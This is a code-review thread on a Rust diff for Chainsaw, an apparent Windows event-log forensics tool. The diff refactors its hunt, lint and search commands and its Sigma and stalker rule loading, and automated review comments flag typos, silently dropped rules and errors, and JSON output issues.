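Review bot: The `timestamp` option in the `Search` variant is declared with `requires_if("from", "to")`, which structopt reads as "require `--to` when the value passed to `--timestamp` is literally `from`"; that is unlikely to be the intended relationship. If the intent is that `--from`/`--to` only make sense once the timestamp field is known, the constraint belongs on those options instead, e.g. `#[structopt(long = "from", requires = "timestamp")]` and the same for `to`. Several doc comments surface verbatim in `--help` and carry typos: `/// Apply addional metadata for the tablar output.` should read `/// Apply additional metadata for the tabular output.`, and `Supress` should be `Suppress` on both `-q` flags. The `regexp` option also reuses the `pattern` text ("A pattern to search for."); something like `/// One or more regular expressions to search for (may be repeated).` would tell the user how it differs from the positional pattern.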
@@ -45,94 +162,270 @@ fn print_title() { ); } -fn main() { - // Get command line arguments - let opt = Opts::from_args(); - // Load up the writer - let writer = match &opt.cmd { - Chainsaw::Hunt(args) => { - let output = match &args.output { - Some(path) => { - let file = match File::create(path) { - Ok(f) => f, - Err(e) => { - return exit_chainsaw(Err(anyhow::anyhow!( - "Unable to write to specified output file - {} - {}", - path.display(), - e - ))); - } - }; - Some(file) +fn init_writer(output: Option, json: bool, quiet: bool) -> crate::Result<()> { + let output = match &output { + Some(path) => { + let file = match File::create(path) { + Ok(f) => f, + Err(e) => { + return Err(anyhow::anyhow!( + "Unable to write to specified output file - {} - {}", + path.display(), + e + )); } - None => None, }; - if args.json { - write::Writer { - format: write::Format::Json, - output, - quiet: args.quiet, - } - } else if let Some(dir) = &args.csv { - write::Writer { - format: write::Format::Csv(dir.clone()), - output, - quiet: args.quiet, + Some(file) + } + None => None, + }; + let format = if json { Format::Json } else { Format::Std }; + let writer = Writer { + format, + output, + quiet, + }; + set_writer(writer).expect("could not set writer"); + Ok(()) +} + +fn run() -> Result<()> { + let opts = Opts::from_args(); + match opts.cmd { + Command::Hunt { + rules, + path, + + mapping, + rule, + + load_unknown, + column_width, + extension, + from, + full, + json, + local, + metadata, + output, + quiet, + skip_errors, + timezone, + to, + } => { + init_writer(output, json, quiet)?; + if !opts.no_banner { + print_title(); + } + let mut rules = vec![rules]; + if let Some(rule) = rule { + rules.extend(rule) + }; + cs_eprintln!("[+] Loading rules..."); + let mut failed = 0; + let mut count = 0; + let mut rs = vec![]; + for path in &rules { + for file in get_files(path, &None)? 
{ + match load_rule(&RuleKind::Sigma, &file) { + Ok(mut r) => { + count += 1; + rs.append(&mut r) + } + Err(_) => { + failed += 1; + } + } } + } + if failed > 0 { + cs_eprintln!( + "[+] Loaded {} detection rules ({} were not loaded)", + count, + failed + ); + } else { + cs_eprintln!("[+] Loaded {} detection rules", count); + } + let rules = rs; + let mut hunter = Hunter::builder() + .rules(rules) + .mappings(mapping.unwrap_or_default()) + .load_unknown(load_unknown) + .local(local) + .skip_errors(skip_errors); + if let Some(from) = from { + hunter = hunter.from(from); + } + if let Some(timezone) = timezone { + hunter = hunter.timezone(timezone); + } + if let Some(to) = to { + hunter = hunter.to(to); + } + let hunter = hunter.build()?; + let mut files = vec![]; + for path in &path { + files.extend(get_files(path, &extension)?); + } + let mut detections = vec![]; + let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); + for file in &files { + pb.tick(); + detections.extend(hunter.hunt(file)?); + pb.inc(1); + } + pb.finish(); + if json { + cli::print_json(&detections, hunter.rules(), local, timezone)?; } else { - write::Writer { - format: write::Format::Std, - output, - quiet: args.quiet, + cli::print_detections( + &detections, + hunter.mappings(), + hunter.rules(), + column_width.unwrap_or(40), + full, + local, + metadata, + timezone, + ); + } + cs_eprintln!( + "[+] {} Detections found on {} documents", + detections.iter().map(|d| d.hits.len()).sum::(), + detections.len() + ); + } + Command::Lint { path, kind } => { + init_writer(None, false, false)?; + if !opts.no_banner { + print_title(); + } + cs_eprintln!("[+] Validating supplied detection rules..."); + let mut count = 0; + let mut failed = 0; + for file in get_files(&path, &None)? { + if let Err(e) = lint_rule(&kind, &file) { + failed += 1; + cs_eprintln!("[!] 
{}", e); + continue; } + count += 1; } + cs_eprintln!( + "[+] Validated {} detection rules ({} were not loaded)", + count, + failed + ); } - Chainsaw::Search(args) => { - let output = match &args.output { - Some(path) => { - let file = match File::create(path) { - Ok(f) => f, + Command::Search { + path, + + pattern, + regexp, + + extension, + from, + ignore_case, + json, + load_unknown, + local, + output, + quiet, + skip_errors, + tau, + timestamp, + timezone, + to, + } => { + init_writer(output, json, quiet)?; + if !opts.no_banner { + print_title(); + } + let mut paths = if regexp.is_some() { + let mut scratch = pattern + .as_ref() + .map(|p| vec![PathBuf::from(p)]) + .unwrap_or_default(); + scratch.extend(path); + scratch + } else { + path + }; + if paths.is_empty() { + paths.push( + std::env::current_dir().expect("could not get current working directory"), + ); + } + let mut files = vec![]; + for path in &paths { + files.extend(get_files(path, &extension)?); + } + let mut searcher = Searcher::builder() + .ignore_case(ignore_case) + .load_unknown(load_unknown) + .local(local) + .skip_errors(skip_errors); + if let Some(patterns) = regexp { + searcher = searcher.patterns(patterns); + } else if let Some(pattern) = pattern { + searcher = searcher.patterns(vec![pattern]); + } + if let Some(from) = from { + searcher = searcher.from(from); + } + if let Some(tau) = tau { + searcher = searcher.tau(tau); + } + if let Some(timestamp) = timestamp { + searcher = searcher.timestamp(timestamp); + } + if let Some(timezone) = timezone { + searcher = searcher.timezone(timezone); + } + if let Some(to) = to { + searcher = searcher.to(to); + } + let searcher = searcher.build()?; + cs_eprintln!("[+] Searching event logs..."); + if json { + cs_print!("["); + } + let mut hits = 0; + for file in &files { + for res in searcher.search(file)?.iter() { + let hit = match res { + Ok(hit) => hit, Err(e) => { - return exit_chainsaw(Err(anyhow::anyhow!( - "Unable to write to specified output file 
- {} - {}", - path.display(), - e - ))); + if skip_errors { + continue; + } + anyhow::bail!("Failed to search file... - {}", e); } }; - Some(file) + if json { + if !(hits == 0) { + cs_print!(","); + } + cs_print_json!(&hit)?; + } else { + cs_print_yaml!(&hit)?; + } + hits += 1; } - None => None, - }; - write::Writer { - format: write::Format::Std, - output, - quiet: args.quiet, } + if json { + cs_println!("]"); + } + cs_println!("[+] Found {} matching log entries", hits); } - _ => write::Writer::default(), - }; - write::set_writer(writer).unwrap(); - print_title(); - // Determine sub-command: hunt/search/check - let result = match opt.cmd { - Chainsaw::Search(args) => search::run_search(args), - Chainsaw::Hunt(args) => hunt::run_hunt(args), - Chainsaw::Check(args) => check::run_check(args), - }; - exit_chainsaw(result); + } + Ok(()) } -fn exit_chainsaw(result: Result) { - // Handle successful/failed status messages returned by chainsaw - std::process::exit(match result { - Ok(m) => { - cs_egreenln!("{}", m); - 0 - } - Err(e) => { - cs_eredln!("[!] Chainsaw exited: {}", e); - 1 - } - }) +fn main() { + if let Err(e) = run() { + cs_eredln!("[x] {}", e); + std::process::exit(1); + } } diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs new file mode 100644 index 00000000..dddcca9e --- /dev/null +++ b/src/rule/chainsaw.rs @@ -0,0 +1,15 @@ +use serde::Deserialize; +use tau_engine::Rule as Tau; + +#[derive(Clone, Debug, Deserialize)] +#[serde(rename_all = "lowercase")] +pub struct Rule { + pub level: String, + #[serde(alias = "title")] + pub tag: String, + #[serde(flatten)] + pub tau: Tau, + + pub authors: Vec, + pub status: String, +} diff --git a/src/rule/mod.rs b/src/rule/mod.rs new file mode 100644 index 00000000..9e11134f --- /dev/null +++ b/src/rule/mod.rs 
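Review bot: Rule files that fail to load in the `Hunt` arm are only counted (`Err(_) => { failed += 1; }`), so a malformed or truncated rule silently drops out of the hunt and the operator sees nothing beyond a number in the summary; the `Lint` arm already prints the error, and a matching `Err(e) => { failed += 1; cs_eprintln!("[!] {}", e); }` here would make the gap visible without changing the flow. In the `Search` arm the closing summary is written with `cs_println!("[+] Found {} matching log entries", hits);` while the JSON array itself is emitted through `cs_print!`/`cs_println!("]")`; if those macros share the writer installed by `init_writer`, the summary lands inside the JSON document (or the `-o` file) right after `]`, whereas `Hunt` reports its summary with `cs_eprintln!` — switching this one line to `cs_eprintln!` keeps `--json` output parseable. Separately, every path, including the extra `-r/--rule` paths, is loaded with `load_rule(&RuleKind::Sigma, &file)`, so non-Sigma rules cannot be hunted with despite the `RuleKind` enum; if that is intentional for the alpha a short comment on that line would save the next reader a detour.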
@@ -0,0 +1,99 @@ +use std::path::PathBuf; +use std::str::FromStr; + +use serde::Deserialize; + +pub use chainsaw::Rule; + +pub mod chainsaw; +pub mod sigma; +pub mod stalker; + +#[derive(Debug, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum Kind { + Chainsaw, + Sigma, + Stalker, +} + +impl Default for Kind { + fn default() -> Self { + Self::Chainsaw + } +} + +impl FromStr for Kind { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "chainsaw" => Self::Chainsaw, + "sigma" => Self::Sigma, + "stalker" => Self::Stalker, + _ => anyhow::bail!("unknown kind, must be: chainsaw, sigma or stalker"), + }; + Ok(v) + } +} + +pub fn load_rule(kind: &Kind, path: &PathBuf) -> crate::Result> { + if let Some(x) = path.extension() { + if x != "yml" && x != "yaml" { + anyhow::bail!("rule must have a yaml file extension"); + } + } + let rules = match kind { + Kind::Chainsaw => { + unimplemented!() + } + Kind::Sigma => match sigma::load(&path) { + Ok(rules) => rules + .into_iter() + .filter_map(|r| serde_yaml::from_value(r).ok()) + .collect(), + Err(e) => anyhow::bail!(e), + }, + Kind::Stalker => match stalker::load(&path) { + Ok(rule) => vec![rule], + Err(e) => anyhow::bail!(e), + }, + }; + Ok(rules) +} + +pub fn lint_rule(kind: &Kind, path: &PathBuf) -> crate::Result<()> { + if let Some(x) = path.extension() { + if x != "yml" && x != "yaml" { + anyhow::bail!("rule must have a yaml file extension"); + } + } + match kind { + Kind::Chainsaw => { + unimplemented!() + } + Kind::Sigma => { + if let Err(e) = sigma::load(&path) { + let file_name = match path.to_string_lossy().split('/').last() { + Some(e) => e.to_string(), + None => path.display().to_string(), + }; + if let Some(source) = e.source() { + anyhow::bail!("{:?}: {} - {}", file_name, e, source); + } else { + anyhow::bail!("{:?}: {}", file_name, e); + } + } + } + Kind::Stalker => { + if let Err(e) = stalker::load(&path) { + let file_name = match 
path.to_string_lossy().split('/').last() { + Some(e) => e.to_string(), + None => path.display().to_string(), + }; + anyhow::bail!("{:?}: {}", file_name, e); + } + } + } + Ok(()) +} diff --git a/src/convert/sigma.rs b/src/rule/sigma.rs similarity index 98% rename from src/convert/sigma.rs rename to src/rule/sigma.rs index fc0ab57d..eec09e7c 100644 --- a/src/convert/sigma.rs +++ b/src/rule/sigma.rs @@ -16,16 +16,6 @@ struct Detection { pub identifiers: Mapping, } -//#[derive(Clone, Deserialize)] -//struct LogSource { -// #[serde(default)] -// pub category: Option, -// #[serde(default)] -// pub product: Option, -// #[serde(default)] -// pub service: Option, -//} - #[derive(Clone, Deserialize)] struct Header { pub title: String, @@ -46,8 +36,6 @@ struct Sigma { pub header: Option
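Review bot: Both `load_rule` and `lint_rule` reach `unimplemented!()` for `Kind::Chainsaw`, which is also the variant `impl Default for Kind` returns, so any caller that relies on the default kind panics instead of getting an error; until the chainsaw loader exists, `Kind::Chainsaw => anyhow::bail!("chainsaw rules are not supported yet"),` keeps the failure on the `Result` path. In the sigma arm of `load_rule`, `.filter_map(|r| serde_yaml::from_value(r).ok())` silently discards every converted rule that fails to deserialize into `Rule`, so a detection can vanish from a hunt with no message; count and report the drops, or surface the error as `lint_rule` already does for the load step. The file-name extraction in `lint_rule` splits on `'/'`, which leaves the full path untouched for Windows separators; `path.file_name().map(|f| f.to_string_lossy().into_owned()).unwrap_or_else(|| path.display().to_string())` handles both, and hoisting it above the `match` removes the duplicated block in the two arms.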
, #[serde(default)] pub level: Option, - //#[serde(default)] - //pub logsource: Option, #[serde(default)] pub detection: Option, } diff --git a/src/rule/stalker.rs b/src/rule/stalker.rs new file mode 100644 index 00000000..7754aa00 --- /dev/null +++ b/src/rule/stalker.rs @@ -0,0 +1,38 @@ +use std::fs::File; +use std::io::Read; +use std::path::Path; + +use serde::Deserialize; +use tau_engine::Rule as Tau; + +use crate::rule::Rule; + +#[derive(Clone, Deserialize)] +pub struct Stalker { + tag: String, + tau: Tau, + level: String, + status: String, + authors: Vec, +} + +impl From for Rule { + fn from(stalker: Stalker) -> Self { + Self { + tag: stalker.tag, + level: stalker.level, + status: stalker.status, + tau: stalker.tau, + authors: stalker.authors, + } + } +} + +pub fn load(rule: &Path) -> crate::Result { + let mut file = File::open(rule)?; + let mut contents = String::new(); + file.read_to_string(&mut contents)?; + + let stalker: Stalker = serde_yaml::from_str(&contents)?; + Ok(Rule::from(stalker)) +} diff --git a/src/search.rs b/src/search.rs index 2bdb4402..1a887f79 100644 --- a/src/search.rs +++ b/src/search.rs 
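Review bot: `Stalker` and `load` are new public items without doc comments, and the error `load` returns from `serde_yaml::from_str` carries no file path, so the only place the name gets attached is the prefixing in `lint_rule`. A one-line `/// Reads a stalker rule from `rule` and converts it into a `Rule`; fails on I/O or YAML errors and does not include the path in the error.` on `load` would tell callers what they are expected to add.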
@@ -1,233 +1,292 @@ -use std::fs::File; -use std::path::PathBuf; - -use anyhow::Result; -use chrono::NaiveDateTime; -use evtx::{EvtxParser, ParserSettings}; -use regex::Regex; -use structopt::StructOpt; - -use crate::util::get_evtx_files; - -#[derive(StructOpt)] -pub struct SearchOpts { - /// Specify an EVTX file, or a directory containing the EVTX files to search. - /// If you specify a directory, all files matching *.evtx will be used. - pub evtx_path: PathBuf, - - /// Suppress all unnecessary output - #[structopt(short = "q", long = "quiet")] - pub quiet: bool, - - /// This option can be used in conjunction with any other search methods. It will only return - /// results of the event ID supplied. - #[structopt(short = "e", long = "event")] - pub event_id: Option, - - /// Use this option to search EVTx files for the string supplied. If the string is found, the - /// whole matching event will be returned. - /// Use the -i flag for case insensitive searches. - #[structopt(short = "s", long = "string")] - pub search_string: Option, - - /// Skip EVTX file if chainsaw is unable to parse the records - #[structopt(long = "ignore-errors")] - pub ignore: bool, - - /// Set search to case insensitive. Usable only with string searching. - #[structopt(short = "i", long = "case-insensitive")] - pub case_insensitive: bool, - - /// Output matching event log entries in a JSON format - #[structopt(short, long = "json")] - pub json: bool, - - /// Use this option to search EVTx files for the regex pattern supplied. If a pattern match is found, the - /// whole matching event will be returned. - #[structopt(short = "r", long = "regex-search")] - pub search_regex: Option, - - /// Start date for including events (UTC). Anything older than this is dropped. Format: YYYY-MM-DDTHH:MM:SS. Example: 2019-11-17T17:55:11 - #[structopt(long = "start-date")] - pub start_date: Option, - - /// End date for including events (UTC). Anything newer than this is dropped. Format: YYYY-MM-DDTHH:MM:SS. 
Example: 2019-11-17T17:55:11 - #[structopt(long = "end-date")] - pub end_date: Option, - - /// Output with be saved to the specified file path, this is ignored by --csv - #[structopt(long = "output")] - pub output: Option, -} - -pub fn run_search(opt: SearchOpts) -> Result { - // Load EVTX Files - let evtx_files = get_evtx_files(&opt.evtx_path)?; - if opt.json { - cs_print!("["); - } +use std::path::Path; - let mut sd_marker = None; - let mut ed_marker = None; +use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; +use chrono_tz::Tz; +use regex::{RegexSet, RegexSetBuilder}; +use serde_json::Value as Json; +use tau_engine::{ + core::parser::{BoolSym, Expression}, + Document as Doc, +}; - let time_format = "%Y-%m-%dT%H:%M:%S"; +use crate::ext; +use crate::file::{Document, Documents, Reader}; - // if start date filter is provided, validate that the provided string is a valid timestamp - if let Some(x) = &opt.start_date { - sd_marker = match NaiveDateTime::parse_from_str(x.as_str(), time_format) { - Ok(a) => { - cs_eprintln!("[+] Filtering out events before: {}", a); - Some(a) - } - Err(e) => return Err(anyhow!("Error parsing provided start-date filter: {}", e)), - } - } +pub struct Hits<'a> { + reader: Reader, + searcher: &'a SearcherInner, +} - // if end date filter is provided, validate that the provided string is a valid timestamp - if let Some(x) = &opt.end_date { - ed_marker = match NaiveDateTime::parse_from_str(x.as_str(), time_format) { - Ok(a) => { - cs_eprintln!("[+] Filtering out events after: {}", a); - Some(a) - } - Err(e) => return Err(anyhow!("Error parsing provided end-date filter: {}", e)), +impl<'a> Hits<'a> { + pub fn iter(&mut self) -> Iter<'_> { + Iter { + documents: self.reader.documents(), + searcher: self.searcher, } } +} - // Loop through EVTX files and perform actions - let mut hits = 0; - cs_eprintln!("[+] Searching event logs..."); - for evtx in &evtx_files { - // Parse EVTx files - let settings = ParserSettings::default() - 
.separate_json_attributes(true) - .num_threads(0); - let parser = match EvtxParser::from_path(evtx) { - Ok(a) => a.with_configuration(settings), - Err(e) => { - if opt.ignore { - continue; - } - return Err(anyhow!("{:?} - {}", evtx, e)); - } - }; - - // Search EVTX files for user supplied arguments - hits += search_evtx_file(parser, &opt, hits == 0, sd_marker, ed_marker)?; - } - if opt.json { - cs_println!("]"); - } - Ok(format!("\n[+] Found {} matching log entries", hits)) +pub struct Iter<'a> { + documents: Documents<'a>, + searcher: &'a SearcherInner, } -pub fn search_evtx_file( - mut parser: EvtxParser, - opt: &SearchOpts, - first: bool, - sd_marker: Option, - ed_marker: Option, -) -> Result { - let mut hits = 0; - - for record in parser.records_json_value() { - // TODO - work out why chunks of a record can fail here, but the overall event logs count - // isn't affected. If this parser isn't seeing an event that you know exists, it's mostly - // likely due to this match block - let r = match record { - Ok(record) => record, - Err(_) => { - continue; - } - }; +impl<'a> Iterator for Iter<'a> { + type Item = crate::Result; - // Perform start/end datetime filtering - if sd_marker.is_some() || ed_marker.is_some() { - let event_time = match NaiveDateTime::parse_from_str( - r.data["Event"]["System"]["TimeCreated_attributes"]["SystemTime"] - .as_str() - .unwrap(), - "%Y-%m-%dT%H:%M:%S%.6fZ", - ) { - Ok(t) => t, - Err(_) => { - return Err(anyhow!( - "Failed to parse datetime from supplied events. This shouldn't happen..." 
- )); + fn next(&mut self) -> Option { + while let Some(document) = self.documents.next() { + let document = match document { + Ok(document) => document, + Err(e) => { + if self.searcher.skip_errors { + continue; + } + return Some(Err(e)); } }; - - // Check if event is older than start date marker - if let Some(sd) = sd_marker { - if event_time <= sd { - continue; + if self.searcher.timestamp.is_some() + && (self.searcher.from.is_some() || self.searcher.to.is_some()) + { + let field = self + .searcher + .timestamp + .as_ref() + .expect("could not get timestamp"); + // TODO: Default to RFC 3339 + let timestamp = match &document { + Document::Evtx(evtx) => match crate::evtx::Wrapper(&evtx.data).find(&field) { + Some(value) => match value.as_str() { + Some(timestamp) => { + match NaiveDateTime::parse_from_str( + timestamp, + "%Y-%m-%dT%H:%M:%S%.6fZ", + ) { + Ok(t) => t, + Err(e) => { + if self.searcher.skip_errors { + cs_eyellowln!( + "failed to parse timestamp '{}' - {}", + timestamp, + e, + ); + continue; + } else { + return Some(Err(anyhow::anyhow!( + "failed to parse timestamp '{}' - {}", + timestamp, + e + ))); + } + } + } + } + None => continue, + }, + None => continue, + }, + }; + // TODO: Not sure if this is correct... 
+ let localised = if let Some(timezone) = self.searcher.timezone { + let local = match timezone.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.searcher.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + continue; + } else { + return Some(Err(anyhow::anyhow!("failed to localise timestamp"))); + } + } + }; + local.with_timezone(&Utc) + } else if self.searcher.local { + match Utc.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.searcher.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + continue; + } else { + return Some(Err(anyhow::anyhow!("failed to localise timestamp"))); + } + } + } + } else { + DateTime::::from_utc(timestamp, Utc) + }; + // Check if event is older than start date marker + if let Some(sd) = self.searcher.from { + if localised <= sd { + continue; + } + } + // Check if event is newer than end date marker + if let Some(ed) = self.searcher.to { + if localised >= ed { + continue; + } } } - // Check if event is newer than end date marker - if let Some(ed) = ed_marker { - if event_time >= ed { + let r = match document { + Document::Evtx(evtx) => evtx, + }; + if let Some(expression) = &self.searcher.tau { + if !tau_engine::core::solve(&expression, &crate::evtx::Wrapper(&r.data)) { continue; } } + if r.matches(&self.searcher.regex) { + return Some(Ok(r.data)); + } } - // Do processing of EVTX record now it's in a JSON format - // - // The default action of the whole OK logic block it mark a record as matched - // If a filter criteria is NOT matched, then we contiue the loop and don't push the - // Record onto the matched records array - - // EventIDs can be stored in two different locations - let event_id; - if r.data["Event"]["System"]["EventID"]["#text"].is_null() { - event_id = &r.data["Event"]["System"]["EventID"]; - } else { - event_id = &r.data["Event"]["System"]["EventID"]["#text"]; - } + None + } +} - // Handle event_id search option - if let Some(e_id) = 
opt.event_id { - if event_id != e_id { - continue; - } - }; - // Handle string search option - if let Some(string) = &opt.search_string { - if opt.case_insensitive { - // Case insensitive string search - if !r - .data - .to_string() - .to_lowercase() - .contains(&string.to_lowercase()) - { - continue; +pub trait Searchable { + fn matches(&self, regex: &RegexSet) -> bool; +} + +#[derive(Default)] +pub struct SearcherBuilder { + patterns: Option>, + + from: Option, + ignore_case: Option, + load_unknown: Option, + local: Option, + skip_errors: Option, + tau: Option>, + timestamp: Option, + timezone: Option, + to: Option, +} + +impl SearcherBuilder { + pub fn new() -> Self { + Self::default() + } + + pub fn build(self) -> crate::Result { + let ignore_case = self.ignore_case.unwrap_or_default(); + let load_unknown = self.load_unknown.unwrap_or_default(); + let local = self.local.unwrap_or_default(); + let patterns = self.patterns.unwrap_or_default(); + let skip_errors = self.skip_errors.unwrap_or_default(); + let tau = match self.tau { + Some(kvs) => { + let mut expressions = Vec::with_capacity(kvs.len()); + for kv in &kvs { + expressions.push(ext::tau::parse_kv(kv)?); } - } else { - // Case sensitive search - if !r.data.to_string().contains(string) { - continue; + if expressions.is_empty() { + None + } else { + Some(Expression::BooleanGroup(BoolSym::And, expressions)) } } + None => None, }; - // Handle regex search option - if let Some(reg) = &opt.search_regex { - let re = Regex::new(reg)?; - if !re.is_match(&r.data.to_string()) { - continue; - } - } + let regex = RegexSetBuilder::new(patterns) + .case_insensitive(ignore_case) + .build()?; - if opt.json { - if !(first && hits == 0) { - cs_print!(","); - } - cs_print_json!(&r.data)?; - } else { - cs_print_yaml!(&r.data)?; - } + Ok(Searcher { + inner: SearcherInner { + regex: regex, + + from: self.from.map(|d| DateTime::from_utc(d, Utc)), + load_unknown, + local, + skip_errors, + tau, + timestamp: self.timestamp, + 
timezone: self.timezone, + to: self.to.map(|d| DateTime::from_utc(d, Utc)), + }, + }) + } + + pub fn from(mut self, datetime: NaiveDateTime) -> Self { + self.from = Some(datetime); + self + } + + pub fn ignore_case(mut self, ignore: bool) -> Self { + self.ignore_case = Some(ignore); + self + } + + pub fn load_unknown(mut self, allow: bool) -> Self { + self.load_unknown = Some(allow); + self + } + + pub fn local(mut self, local: bool) -> Self { + self.local = Some(local); + self + } + + pub fn patterns(mut self, patterns: Vec) -> Self { + self.patterns = Some(patterns); + self + } + + pub fn skip_errors(mut self, skip: bool) -> Self { + self.skip_errors = Some(skip); + self + } + + pub fn tau(mut self, kvs: Vec) -> Self { + self.tau = Some(kvs); + self + } + + pub fn timestamp(mut self, field: String) -> Self { + self.timestamp = Some(field); + self + } + + pub fn timezone(mut self, tz: Tz) -> Self { + self.timezone = Some(tz); + self + } + + pub fn to(mut self, datetime: NaiveDateTime) -> Self { + self.to = Some(datetime); + self + } +} + +pub struct SearcherInner { + regex: RegexSet, + + load_unknown: bool, + local: bool, + from: Option>, + skip_errors: bool, + tau: Option, + timestamp: Option, + timezone: Option, + to: Option>, +} + +pub struct Searcher { + inner: SearcherInner, +} + +impl Searcher { + pub fn builder() -> SearcherBuilder { + SearcherBuilder::new() + } - hits += 1; + pub fn search(&self, file: &Path) -> crate::Result> { + let reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; + Ok(Hits { + reader, + searcher: &self.inner, + }) } - Ok(hits) } diff --git a/src/util.rs b/src/util.rs deleted file mode 100644 index 01501269..00000000 --- a/src/util.rs +++ /dev/null 
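Review bot: In `Iter::next`, when a `--from`/`--to` filter is active and the configured timestamp field is missing from the document or is not a string, both `None => continue` arms drop the document silently even when `skip_errors` is false, so events that cannot be time-filtered disappear from the results with no warning or count. That should be visible to the analyst: at minimum `cs_eyellowln!("no timestamp field '{}' in document, skipping", field)` before each `continue`, or an error on the non-`skip_errors` path like the parse failure just below already returns. The format is also hard-coded to `%Y-%m-%dT%H:%M:%S%.6fZ` despite the `// TODO: Default to RFC 3339` note; `DateTime::parse_from_rfc3339` would accept the fractional-precision and offset variants that the fixed pattern rejects. Minor: `regex: regex` in `build` can use the field shorthand like its neighbours.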
@@ -1,102 +0,0 @@ -use std::fs; -use std::fs::{metadata, File}; -use std::path::{Path, PathBuf}; - -use anyhow::Result; -use evtx::{EvtxParser, ParserSettings}; -use indicatif::{ProgressBar, ProgressDrawTarget, ProgressStyle}; -#[cfg(windows)] -use is_elevated::is_elevated as user_is_elevated; -use walkdir::WalkDir; - -#[cfg(not(windows))] -pub const RULE_PREFIX: &str = "‣ "; - -#[cfg(windows)] -pub const RULE_PREFIX: &str = "+ "; - -#[cfg(not(windows))] -const TICK_SETTINGS: (&str, u64) = ("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏ ", 80); - -#[cfg(windows)] -const TICK_SETTINGS: (&str, u64) = (r"-\|/-", 200); - -pub fn large_event_logs(files: &[PathBuf]) -> bool { - for file in files { - let metadata = match fs::metadata(file) { - Ok(a) => a, - Err(_) => return false, - }; - if metadata.len() > 500000000 { - return true; - } - } - false -} - -pub fn get_evtx_files(mut path: &Path) -> Result> { - let mut evtx_files: Vec = Vec::new(); - if path.display().to_string() == *"win_default" { - #[cfg(windows)] - if !user_is_elevated() { - return Err(anyhow!( - "Cannot access local event logs - you are not running in an elevated session!" - )); - } - path = Path::new("C:\\Windows\\System32\\winevt\\Logs\\"); - }; - if path.exists() { - let md = metadata(&path)?; - if md.is_dir() { - // Grab files from within the specified directory - // Check that the file ends in evtx - for file in WalkDir::new(path) { - let file_a = file?; - if let Some(x) = file_a.path().extension() { - if x == "evtx" { - evtx_files.push(file_a.into_path()); - } - } - } - } else { - evtx_files = vec![path.to_path_buf()]; - } - } else { - return Err(anyhow!("Invalid input path: {}", path.display())); - }; - // Check if there is at least one EVTX file in the directory - if !evtx_files.is_empty() { - cs_eprintln!("[+] Found {} EVTX files", evtx_files.len()); - } else { - return Err(anyhow!("No EVTx files found. 
Check input path?")); - } - Ok(evtx_files) -} - -pub fn parse_evtx_file(evtx_file: &Path) -> Result> { - let settings = ParserSettings::default() - .separate_json_attributes(true) - .num_threads(0); - let parser = EvtxParser::from_path(evtx_file)?.with_configuration(settings); - Ok(parser) -} - -pub fn get_progress_bar(size: u64, msg: String) -> indicatif::ProgressBar { - let pb = ProgressBar::new(size); - unsafe { - match crate::write::WRITER.quiet { - true => pb.set_draw_target(ProgressDrawTarget::hidden()), - false => pb.set_draw_target(ProgressDrawTarget::stderr()), - } - }; - pb.set_style( - ProgressStyle::default_bar() - .template("[+] {msg}: [{bar:40}] {pos}/{len} {spinner}") - .tick_chars(TICK_SETTINGS.0) - .progress_chars("=>-"), - ); - - pb.set_message(msg); - pb.enable_steady_tick(TICK_SETTINGS.1); - pb -} diff --git a/src/write.rs b/src/write.rs index ca00f7a6..9e107b96 100644 --- a/src/write.rs +++ b/src/write.rs @@ -1,5 +1,4 @@ use std::fs::File; -use std::path::PathBuf; use anyhow::Result; @@ -12,7 +11,6 @@ pub static mut WRITER: Writer = Writer { pub enum Format { Std, Json, - Csv(PathBuf), } impl Default for Format { @@ -51,11 +49,12 @@ where Ok(()) } +#[macro_export] macro_rules! cs_print { ($($arg:tt)*) => ({ use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { f.write_all(format!($($arg)*).as_bytes()).expect("could not write to file"); } @@ -67,11 +66,12 @@ macro_rules! cs_print { }) } +#[macro_export] macro_rules! cs_println { () => { use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { f.write_all(b"\n").expect("could not write to file"); } 
@@ -84,7 +84,7 @@ macro_rules! cs_println { ($($arg:tt)*) => { use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { f.write_all(format!($($arg)*).as_bytes()).expect("could not write to file"); f.write_all(b"\n").expect("could not write to file"); @@ -101,24 +101,25 @@ macro_rules! cs_println { macro_rules! cs_eprintln { ($($arg:tt)*) => ({ unsafe { - if !$crate::write::WRITER.quiet { + if !$crate::WRITER.quiet { eprintln!($($arg)*); } } }) } +#[macro_export] macro_rules! cs_print_json { ($value:expr) => {{ use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { - $crate::serde_json::to_writer(f, $value)?; + ::serde_json::to_writer(f, $value)?; f.flush() } None => { - $crate::serde_json::to_writer(std::io::stdout(), $value)?; + ::serde_json::to_writer(std::io::stdout(), $value)?; std::io::stdout().flush() } } @@ -126,18 +127,19 @@ macro_rules! cs_print_json { }}; } +#[macro_export] macro_rules! cs_print_yaml { ($value:expr) => {{ use std::io::Write; unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => { - $crate::serde_yaml::to_writer(f, $value)?; + ::serde_yaml::to_writer(f, $value)?; f.write_all(b"\n")?; f.flush() } None => { - $crate::serde_yaml::to_writer(std::io::stdout(), $value)?; + ::serde_yaml::to_writer(std::io::stdout(), $value)?; println!(); std::io::stdout().flush() } @@ -149,7 +151,7 @@ macro_rules! cs_print_yaml { macro_rules! cs_print_table { ($table:ident) => { unsafe { - match $crate::write::WRITER.output.as_ref() { + match $crate::WRITER.output.as_ref() { Some(mut f) => $table.print(&mut f).expect("could not write table to file"), None => $table.printstd(), } 
